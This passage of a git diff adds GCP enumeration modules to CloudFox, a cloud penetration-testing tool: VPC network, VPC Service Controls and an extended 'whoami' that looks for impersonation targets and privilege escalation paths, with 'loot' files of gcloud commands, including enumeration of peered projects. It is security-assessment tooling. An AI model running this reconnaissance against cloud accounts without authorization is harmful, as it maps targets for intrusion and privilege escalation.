+func (o VPCNetworksOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCNetworksOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCNetworksCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCNETWORKS_MODULE_NAME) + if err != nil { + return + } + + module := &VPCNetworksModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + Networks: []vpcservice.VPCNetworkInfo{}, + Subnets: []vpcservice.SubnetInfo{}, + Peerings: []vpcservice.VPCPeeringInfo{}, + Routes: []vpcservice.RouteInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCNetworksModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_VPCNETWORKS_MODULE_NAME, m.processProject) + + if len(m.Networks) == 0 { + logger.InfoM("No VPC networks found", globals.GCP_VPCNETWORKS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d VPC network(s), %d subnet(s), %d peering(s), %d route(s)", + len(m.Networks), len(m.Subnets), len(m.Peerings), len(m.Routes)), globals.GCP_VPCNETWORKS_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating VPC networks in project: %s", projectID), globals.GCP_VPCNETWORKS_MODULE_NAME) + } + + svc := vpcservice.New() + + // Get networks + networks, err := svc.ListVPCNetworks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC networks in project %s", projectID)) + } else { + m.mu.Lock() + m.Networks = append(m.Networks, networks...) + m.mu.Unlock() + } + + // Get subnets + subnets, err := svc.ListSubnets(projectID) + if err == nil { + m.mu.Lock() + m.Subnets = append(m.Subnets, subnets...) + m.mu.Unlock() + } + + // Get peerings + peerings, err := svc.ListVPCPeerings(projectID) + if err == nil { + m.mu.Lock() + m.Peerings = append(m.Peerings, peerings...) + m.mu.Unlock() + } + + // Get routes + routes, err := svc.ListRoutes(projectID) + if err == nil { + m.mu.Lock() + m.Routes = append(m.Routes, routes...) + m.mu.Unlock() + } + + m.mu.Lock() + for _, network := range networks { + m.addNetworkToLoot(network) + } + for _, subnet := range subnets { + m.addSubnetToLoot(subnet) + } + for _, peering := range peerings { + m.addPeeringToLoot(peering) + } + m.mu.Unlock() +} + +func (m *VPCNetworksModule) initializeLootFiles() { + m.LootMap["vpcnetworks-commands"] = &internal.LootFile{ + Name: "vpcnetworks-commands", + Contents: "# VPC Networks Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCNetworksModule) addNetworkToLoot(network vpcservice.VPCNetworkInfo) { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# NETWORK: %s\n"+ + "# ==========================================\n"+ + "# Project: %s\n"+ + "# Routing Mode: %s\n"+ + "# Auto Create Subnets: %v\n"+ + "# Subnets: %d\n"+ + "# Peerings: %d\n"+ + "\n# Describe network:\n"+ + "gcloud compute networks describe %s --project=%s\n\n"+ + "# List subnets in network:\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n\n"+ + "# List peerings:\n"+ + "gcloud compute networks peerings list --network=%s --project=%s\n\n", + network.Name, + network.ProjectID, + network.RoutingMode, + network.AutoCreateSubnetworks, + len(network.Subnetworks), + len(network.Peerings), + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *VPCNetworksModule) addSubnetToLoot(subnet vpcservice.SubnetInfo) { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# SUBNET: %s (Network: %s)\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# CIDR: %s\n"+ + "# Private Google Access: %v\n"+ + "# Flow Logs: %v\n"+ + "\n# Describe subnet:\n"+ + "gcloud compute networks subnets describe %s --region=%s --project=%s\n\n", + subnet.Name, subnet.Network, + subnet.ProjectID, + subnet.Region, + subnet.IPCidrRange, + subnet.PrivateIPGoogleAccess, + subnet.EnableFlowLogs, + subnet.Name, subnet.Region, subnet.ProjectID, + ) +} + +func (m *VPCNetworksModule) addPeeringToLoot(peering vpcservice.VPCPeeringInfo) { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PEERING: %s\n"+ + "# ------------------------------------------\n"+ + "# Project: %s\n"+ + "# Network: %s -> Peer Network: %s\n"+ + "# Peer Project: %s\n"+ + "# State: %s\n"+ + "# Export Routes: %v, Import Routes: %v\n", + peering.Name, + peering.ProjectID, + peering.Network, peering.PeerNetwork, + peering.PeerProjectID, + peering.State, + peering.ExportCustomRoutes, peering.ImportCustomRoutes, + ) + + // Cross-project peering commands + if peering.PeerProjectID != "" && peering.PeerProjectID != peering.ProjectID { + m.LootMap["vpcnetworks-commands"].Contents += fmt.Sprintf( + "\n# Cross-project peering - enumerate peer project:\n"+ + "gcloud compute instances list --project=%s\n"+ + "gcloud compute networks subnets list --project=%s\n\n", + peering.PeerProjectID, + peering.PeerProjectID, + ) + } else { + m.LootMap["vpcnetworks-commands"].Contents += "\n" + } +} + +func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Networks table + netHeader := []string{"Project Name", "Project ID", "Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings"} + var netBody [][]string + for _, network := range m.Networks { + autoSubnets := "No" + if network.AutoCreateSubnetworks { + autoSubnets = "Yes" + } + netBody = append(netBody, []string{ + m.GetProjectName(network.ProjectID), + network.ProjectID, + network.Name, + network.RoutingMode, + autoSubnets, + fmt.Sprintf("%d", len(network.Subnetworks)), + fmt.Sprintf("%d", len(network.Peerings)), + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpc-networks", + Header: netHeader, + Body: netBody, + }) + + // Subnets table + if len(m.Subnets) > 0 { + subHeader := []string{"Project Name", "Project ID", "Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs"} + var subBody [][]string + for _, subnet := range m.Subnets { + privateAccess := "No" + if subnet.PrivateIPGoogleAccess { + privateAccess = "Yes" + } + flowLogs := "No" + if subnet.EnableFlowLogs { + flowLogs = "Yes" + } + subBody = append(subBody, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.ProjectID, + subnet.Name, + subnet.Network, + subnet.Region, + subnet.IPCidrRange, + privateAccess, + flowLogs, + }) + } + tables = append(tables, internal.TableFile{ + Name: "subnets", + Header: subHeader, + Body: subBody, + }) + } + + // Peerings table + if len(m.Peerings) > 0 { + peerHeader := []string{"Project Name", "Project ID", "Name", "Network", "Peer Network", "Peer Project", "State", "Export Routes", "Import Routes"} + var peerBody [][]string + for _, peering := range m.Peerings { + peerProject := peering.PeerProjectID + if peerProject == "" { + peerProject = "-" + } + exportRoutes := "No" + if peering.ExportCustomRoutes { + exportRoutes = "Yes" + } + importRoutes := "No" + if peering.ImportCustomRoutes { + importRoutes = "Yes" + } + peerBody = append(peerBody, []string{ + m.GetProjectName(peering.ProjectID), + peering.ProjectID, + peering.Name, + peering.Network, + peering.PeerNetwork, + peerProject, + peering.State, + exportRoutes, + importRoutes, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpc-peerings", + Header: peerHeader, + Body: peerBody, + }) + } + + // Routes table (custom routes only, skip default) + var customRoutes []vpcservice.RouteInfo + for _, route := range m.Routes { + if !strings.HasPrefix(route.Name, "default-route-") { + customRoutes = append(customRoutes, route) + } + } + if len(customRoutes) > 0 { + routeHeader := []string{"Project Name", "Project ID", "Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority"} + var routeBody [][]string + for _, route := range customRoutes { + routeBody = append(routeBody, []string{ + m.GetProjectName(route.ProjectID), + route.ProjectID, + route.Name, + route.Network, + route.DestRange, + route.NextHopType, + route.NextHop, + fmt.Sprintf("%d", route.Priority), + }) + } + tables = append(tables, internal.TableFile{ + Name: "custom-routes", + Header: routeHeader, + Body: routeBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := VPCNetworksOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) + } +} diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go new file mode 100644 index 00000000..5e4717d5 --- /dev/null +++ b/gcp/commands/vpcsc.go @@ -0,0 +1,344 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" + vpcscservice "github.com/BishopFox/cloudfox/gcp/services/vpcscService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var orgID string + +var GCPVPCSCCommand = &cobra.Command{ + Use: globals.GCP_VPCSC_MODULE_NAME, + Aliases: []string{"vpcsc", "service-controls", "sc"}, + Short: "Enumerate VPC Service Controls", + Long: `Enumerate VPC Service Controls configuration. + +Features: +- Lists access policies for the organization +- Enumerates service perimeters (regular and bridge) +- Shows access levels and their conditions +- Identifies overly permissive configurations +- Analyzes ingress/egress policies + +Note: Organization ID is auto-discovered from project ancestry. Use --org flag to override.`, + Run: runGCPVPCSCCommand, +} + +func init() { + GCPVPCSCCommand.Flags().StringVar(&orgID, "org", "", "Organization ID (auto-discovered if not provided)") +} + +type VPCSCModule struct { + gcpinternal.BaseGCPModule + OrgID string + Policies []vpcscservice.AccessPolicyInfo + Perimeters []vpcscservice.ServicePerimeterInfo + AccessLevels []vpcscservice.AccessLevelInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type VPCSCOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o VPCSCOutput) TableFiles() []internal.TableFile { return o.Table } +func (o VPCSCOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPVPCSCCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_VPCSC_MODULE_NAME) + if err != nil { + return + } + + // Auto-discover org ID if not provided + effectiveOrgID := orgID + if effectiveOrgID == "" { + cmdCtx.Logger.InfoM("Auto-discovering organization ID...", globals.GCP_VPCSC_MODULE_NAME) + orgsSvc := orgsservice.New() + + // Method 1: Try to get org ID from project ancestry + if len(cmdCtx.ProjectIDs) > 0 { + discoveredOrgID, err := orgsSvc.GetOrganizationIDFromProject(cmdCtx.ProjectIDs[0]) + if err == nil { + effectiveOrgID = discoveredOrgID + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from project ancestry: %s", effectiveOrgID), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // Method 2: Fallback to searching for accessible organizations + if effectiveOrgID == "" { + orgs, err := orgsSvc.SearchOrganizations() + if err == nil && len(orgs) > 0 { + // Extract org ID from name (format: "organizations/ORGID") + effectiveOrgID = strings.TrimPrefix(orgs[0].Name, "organizations/") + cmdCtx.Logger.InfoM(fmt.Sprintf("Discovered organization ID from search: %s (%s)", effectiveOrgID, orgs[0].DisplayName), globals.GCP_VPCSC_MODULE_NAME) + } + } + + // If still no org ID found, error out + if effectiveOrgID == "" { + cmdCtx.Logger.ErrorM("Could not auto-discover organization ID. Use --org flag to specify.", globals.GCP_VPCSC_MODULE_NAME) + return + } + } + + module := &VPCSCModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + OrgID: effectiveOrgID, + Policies: []vpcscservice.AccessPolicyInfo{}, + Perimeters: []vpcscservice.ServicePerimeterInfo{}, + AccessLevels: []vpcscservice.AccessLevelInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM(fmt.Sprintf("Enumerating VPC Service Controls for organization: %s", m.OrgID), globals.GCP_VPCSC_MODULE_NAME) + + svc := vpcscservice.New() + + // List access policies + policies, err := svc.ListAccessPolicies(m.OrgID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access policies for organization %s", m.OrgID)) + return + } + m.Policies = policies + + if len(m.Policies) == 0 { + logger.InfoM("No access policies found", globals.GCP_VPCSC_MODULE_NAME) + return + } + + // For each policy, list perimeters and access levels + for _, policy := range m.Policies { + perimeters, err := svc.ListServicePerimeters(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list perimeters for policy %s", policy.Name)) + } else { + m.Perimeters = append(m.Perimeters, perimeters...) + } + + levels, err := svc.ListAccessLevels(policy.Name) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access levels for policy %s", policy.Name)) + } else { + m.AccessLevels = append(m.AccessLevels, levels...) + } + } + + m.addAllToLoot() + + logger.SuccessM(fmt.Sprintf("Found %d access policy(ies), %d perimeter(s), %d access level(s)", + len(m.Policies), len(m.Perimeters), len(m.AccessLevels)), globals.GCP_VPCSC_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *VPCSCModule) initializeLootFiles() { + m.LootMap["vpcsc-commands"] = &internal.LootFile{ + Name: "vpcsc-commands", + Contents: "# VPC Service Controls Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *VPCSCModule) addAllToLoot() { + // Add policies to loot + for _, policy := range m.Policies { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ==========================================\n"+ + "# POLICY: %s\n"+ + "# ==========================================\n"+ + "# Title: %s\n"+ + "# Parent: %s\n"+ + "\n# Describe access policy:\n"+ + "gcloud access-context-manager policies describe %s\n\n"+ + "# List perimeters:\n"+ + "gcloud access-context-manager perimeters list --policy=%s\n\n"+ + "# List access levels:\n"+ + "gcloud access-context-manager levels list --policy=%s\n\n", + policy.Name, policy.Title, policy.Parent, + policy.Name, policy.Name, policy.Name, + ) + } + + // Add perimeters to loot + for _, perimeter := range m.Perimeters { + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# PERIMETER: %s (Policy: %s)\n"+ + "# ------------------------------------------\n"+ + "# Title: %s\n"+ + "# Type: %s\n"+ + "# Resources: %d\n"+ + "# Restricted Services: %d\n"+ + "# Ingress Policies: %d\n"+ + "# Egress Policies: %d\n"+ + "\n# Describe perimeter:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s\n\n"+ + "# List protected resources:\n"+ + "gcloud access-context-manager perimeters describe %s --policy=%s --format=\"value(status.resources)\"\n\n", + perimeter.Name, perimeter.PolicyName, + perimeter.Title, perimeter.PerimeterType, + len(perimeter.Resources), len(perimeter.RestrictedServices), + perimeter.IngressPolicyCount, perimeter.EgressPolicyCount, + perimeter.Name, perimeter.PolicyName, + perimeter.Name, perimeter.PolicyName, + ) + } + + // Add access levels to loot + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + m.LootMap["vpcsc-commands"].Contents += fmt.Sprintf( + "# ------------------------------------------\n"+ + "# ACCESS LEVEL: %s (Policy: %s)\n"+ + "# ------------------------------------------\n"+ + "# Title: %s\n"+ + "# IP Subnets: %s\n"+ + "# Regions: %s\n"+ + "# Members: %d\n"+ + "\n# Describe access level:\n"+ + "gcloud access-context-manager levels describe %s --policy=%s\n\n", + level.Name, level.PolicyName, + level.Title, ipSubnets, regions, len(level.Members), + level.Name, level.PolicyName, + ) + } +} + +func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { + var tables []internal.TableFile + + // Access Policies table + if len(m.Policies) > 0 { + policyHeader := []string{"Policy", "Title", "Parent", "Created", "Updated"} + var policyBody [][]string + for _, policy := range m.Policies { + policyBody = append(policyBody, []string{ + policy.Name, + policy.Title, + policy.Parent, + policy.CreateTime, + policy.UpdateTime, + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-policies", + Header: policyHeader, + Body: policyBody, + }) + } + + // Service Perimeters table + if len(m.Perimeters) > 0 { + perimeterHeader := []string{ + "Policy", "Name", "Title", "Type", "Resources", "Restricted Services", + "Ingress Policies", "Egress Policies", + } + var perimeterBody [][]string + for _, perimeter := range m.Perimeters { + perimeterBody = append(perimeterBody, []string{ + perimeter.PolicyName, + perimeter.Name, + perimeter.Title, + perimeter.PerimeterType, + fmt.Sprintf("%d", len(perimeter.Resources)), + fmt.Sprintf("%d", len(perimeter.RestrictedServices)), + fmt.Sprintf("%d", perimeter.IngressPolicyCount), + fmt.Sprintf("%d", perimeter.EgressPolicyCount), + }) + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-perimeters", + Header: perimeterHeader, + Body: perimeterBody, + }) + } + + // Access Levels table - one row per member + if len(m.AccessLevels) > 0 { + levelHeader := []string{"Policy", "Name", "Title", "IP Subnets", "Regions", "Member"} + var levelBody [][]string + for _, level := range m.AccessLevels { + ipSubnets := "-" + if len(level.IPSubnetworks) > 0 { + ipSubnets = strings.Join(level.IPSubnetworks, ", ") + } + regions := "-" + if len(level.Regions) > 0 { + regions = strings.Join(level.Regions, ", ") + } + + if len(level.Members) > 0 { + // One row per member + for _, member := range level.Members { + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + member, + }) + } + } else { + // Access level with no members + levelBody = append(levelBody, []string{ + level.PolicyName, + level.Name, + level.Title, + ipSubnets, + regions, + "-", + }) + } + } + tables = append(tables, internal.TableFile{ + Name: "vpcsc-access-levels", + Header: levelHeader, + Body: levelBody, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + output := VPCSCOutput{Table: tables, Loot: lootFiles} + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + "Could not write output") + } +} diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index c686b7ba..c8a2fd83 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -1,34 +1,1088 @@ package commands import ( + "context" "fmt" + "strings" + "sync" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + + cloudidentity "google.golang.org/api/cloudidentity/v1" + cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + crmv3 "google.golang.org/api/cloudresourcemanager/v3" ) +// Flags for whoami command +var whoamiExtended bool +var whoamiGroups []string + var GCPWhoAmICommand = &cobra.Command{ - Use: globals.GCP_WHOAMI_MODULE_NAME, - Short: "Display the email address of the GCP authenticated user", - Args: cobra.NoArgs, - Run: runGCPWhoAmICommand, + Use: globals.GCP_WHOAMI_MODULE_NAME, + Aliases: []string{"identity", "me"}, + Short: "Display identity context for the authenticated GCP user/service account", + Long: `Display identity context for the authenticated GCP user/service account. + +Default output: +- Current identity details (email, type) +- Organization and folder context +- Effective role bindings across projects (with inheritance source) + +With --extended flag (adds): +- Service accounts that can be impersonated +- Privilege escalation opportunities +- Exploitation commands + +With --groups flag: +- Provide known group email addresses when group enumeration is permission denied +- Role bindings from these groups will be included in the output +- Use comma-separated list: --groups=group1@domain.com,group2@domain.com`, + Run: runGCPWhoAmICommand, +} + +func init() { + GCPWhoAmICommand.Flags().BoolVarP(&whoamiExtended, "extended", "e", false, "Enable extended enumeration (impersonation targets, privilege escalation paths)") + GCPWhoAmICommand.Flags().StringSliceVarP(&whoamiGroups, "groups", "g", []string{}, "Comma-separated list of known group email addresses (used when group enumeration is permission denied)") +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type IdentityContext struct { + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string // Keep for backward compatibility + Projects []ProjectInfo // New: stores project ID and display name + Organizations []OrgInfo + Folders []FolderInfo + Groups []GroupMembership // Groups the identity is a member of + GroupsEnumerated bool // Whether group enumeration was successful + GroupsProvided []string // Groups provided via --groups flag + GroupsMismatch bool // True if provided groups differ from enumerated +} + +type ProjectInfo struct { + ProjectID string + DisplayName string +} + +type OrgInfo struct { + Name string + DisplayName string + OrgID string +} + +type FolderInfo struct { + Name string + DisplayName string + Parent string +} + +type GroupMembership struct { + GroupID string // e.g., "groups/abc123" + Email string // e.g., "security-team@example.com" + DisplayName string // e.g., "Security Team" + Source string // "enumerated" or "provided" +} + +type RoleBinding struct { + Role string + Scope string // "organization", "folder", "project" + ScopeID string + ScopeName string // Display name of the scope resource + Inherited bool + Condition string + InheritedFrom string // Source of binding: "direct", group email, or parent resource + MemberType string // "user", "serviceAccount", "group" +} + +type ImpersonationTarget struct { + ServiceAccount string + ProjectID string + CanImpersonate bool + CanCreateKeys bool + CanActAs bool +} + +type PrivilegeEscalationPath struct { + Name string + Description string + Risk string // CRITICAL, HIGH, MEDIUM + Command string +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WhoAmIModule struct { + gcpinternal.BaseGCPModule + + Identity IdentityContext + RoleBindings []RoleBinding + ImpersonationTargets []ImpersonationTarget + PrivEscPaths []PrivilegeEscalationPath + DangerousPermissions []string + LootMap map[string]*internal.LootFile + Extended bool + ProvidedGroups []string // Groups provided via --groups flag + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type WhoAmIOutput struct { + Table []internal.TableFile + Loot []internal.LootFile } +func (o WhoAmIOutput) TableFiles() []internal.TableFile { return o.Table } +func (o WhoAmIOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ func runGCPWhoAmICommand(cmd *cobra.Command, args []string) { - logger := internal.NewLogger() + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_WHOAMI_MODULE_NAME) + if err != nil { + return + } - // Initialize the OAuthService - oauthService := OAuthService.NewOAuthService() + // Create module instance + module := &WhoAmIModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RoleBindings: []RoleBinding{}, + ImpersonationTargets: []ImpersonationTarget{}, + PrivEscPaths: []PrivilegeEscalationPath{}, + DangerousPermissions: []string{}, + LootMap: make(map[string]*internal.LootFile), + Extended: whoamiExtended, + ProvidedGroups: whoamiGroups, + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { + if m.Extended { + logger.InfoM("Gathering comprehensive identity context (extended mode)...", globals.GCP_WHOAMI_MODULE_NAME) + } else { + logger.InfoM("Gathering identity context...", globals.GCP_WHOAMI_MODULE_NAME) + } - // Call the WhoAmI function + // Step 1: Get current identity + oauthService := OAuthService.NewOAuthService() principal, err := oauthService.WhoAmI() if err != nil { - logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + parsedErr := gcpinternal.ParseGCPError(err, "oauth2.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not retrieve token info") return } - logger.InfoM(fmt.Sprintf("authenticated user email: %s", principal.Email), globals.GCP_WHOAMI_MODULE_NAME) + m.Identity = IdentityContext{ + Email: principal.Email, + ProjectIDs: m.ProjectIDs, + } + + // Determine identity type + if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { + m.Identity.Type = "serviceAccount" + } else { + m.Identity.Type = "user" + } + + logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), globals.GCP_WHOAMI_MODULE_NAME) + + // Step 2: Get organization context (always run) + m.getOrganizationContext(ctx, logger) + + // Step 3: Get group memberships for the current identity + m.getGroupMemberships(ctx, logger) + + // Step 4: Get role bindings across projects (always run) + m.getRoleBindings(ctx, logger) + + // Extended mode: Additional enumeration + if m.Extended { + // Step 4: Find impersonation targets + m.findImpersonationTargets(ctx, logger) + + // Step 5: Identify privilege escalation paths + m.identifyPrivEscPaths(ctx, logger) + } + + // Step 6: Generate loot + m.generateLoot() + + // Write output + m.writeOutput(ctx, logger) +} + +// getOrganizationContext retrieves organization and folder hierarchy +func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { + // Create resource manager clients + crmService, err := cloudresourcemanager.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager client") + return + } + + // Create v3 client for fetching folder details + crmv3Service, err := crmv3.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager v3 client") + // Continue without v3, we just won't get display names for folders + } + + // Get project ancestry for each project + for _, projectID := range m.ProjectIDs { + // Fetch project details to get display name + projectInfo := ProjectInfo{ + ProjectID: projectID, + } + project, err := crmService.Projects.Get(projectID).Do() + if err == nil && project != nil { + projectInfo.DisplayName = project.Name + } + m.Identity.Projects = append(m.Identity.Projects, projectInfo) + + // Get ancestry + resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s", projectID)) + continue + } + + for _, ancestor := range resp.Ancestor { + switch ancestor.ResourceId.Type { + case "organization": + orgInfo := OrgInfo{ + OrgID: ancestor.ResourceId.Id, + Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), + } + // Try to get display name for organization + org, err := crmService.Organizations.Get(orgInfo.Name).Do() + if err == nil && org != nil { + orgInfo.DisplayName = org.DisplayName + } + // Check if already added + exists := false + for _, o := range m.Identity.Organizations { + if o.OrgID == orgInfo.OrgID { + exists = true + break + } + } + if !exists { + m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) + } + case "folder": + folderName := fmt.Sprintf("folders/%s", ancestor.ResourceId.Id) + folderInfo := FolderInfo{ + Name: folderName, + } + // Try to get display name for folder using v3 API + if crmv3Service != nil { + folder, err := crmv3Service.Folders.Get(folderName).Do() + if err == nil && folder != nil { + folderInfo.DisplayName = folder.DisplayName + folderInfo.Parent = folder.Parent + } + } + // Check if already added + exists := false + for _, f := range m.Identity.Folders { + if f.Name == folderInfo.Name { + exists = true + break + } + } + if !exists { + m.Identity.Folders = append(m.Identity.Folders, folderInfo) + } + } + } + } + + if len(m.Identity.Organizations) > 0 { + logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// getGroupMemberships retrieves the groups that the current identity is a member of +func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Store provided groups + m.Identity.GroupsProvided = m.ProvidedGroups + + // Only applicable for user identities (not service accounts) + if m.Identity.Type != "user" { + m.Identity.GroupsEnumerated = true // N/A for service accounts + // If groups were provided for a service account, add them as provided + if len(m.ProvidedGroups) > 0 { + for _, groupEmail := range m.ProvidedGroups { + m.Identity.Groups = append(m.Identity.Groups, GroupMembership{ + Email: groupEmail, + Source: "provided", + }) + } + logger.InfoM(fmt.Sprintf("Using %d provided group(s) for service account", len(m.ProvidedGroups)), globals.GCP_WHOAMI_MODULE_NAME) + } + return + } + + ciService, err := cloudidentity.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + parsedErr := gcpinternal.ParseGCPError(err, "cloudidentity.googleapis.com") + gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Identity client") + // GroupsEnumerated stays false - use provided groups if available + m.useProvidedGroups(logger) + return + } + + // Search for groups that the user is a direct member of + // The parent must be "groups/-" to search across all groups + query := fmt.Sprintf("member_key_id == '%s'", m.Identity.Email) + resp, err := 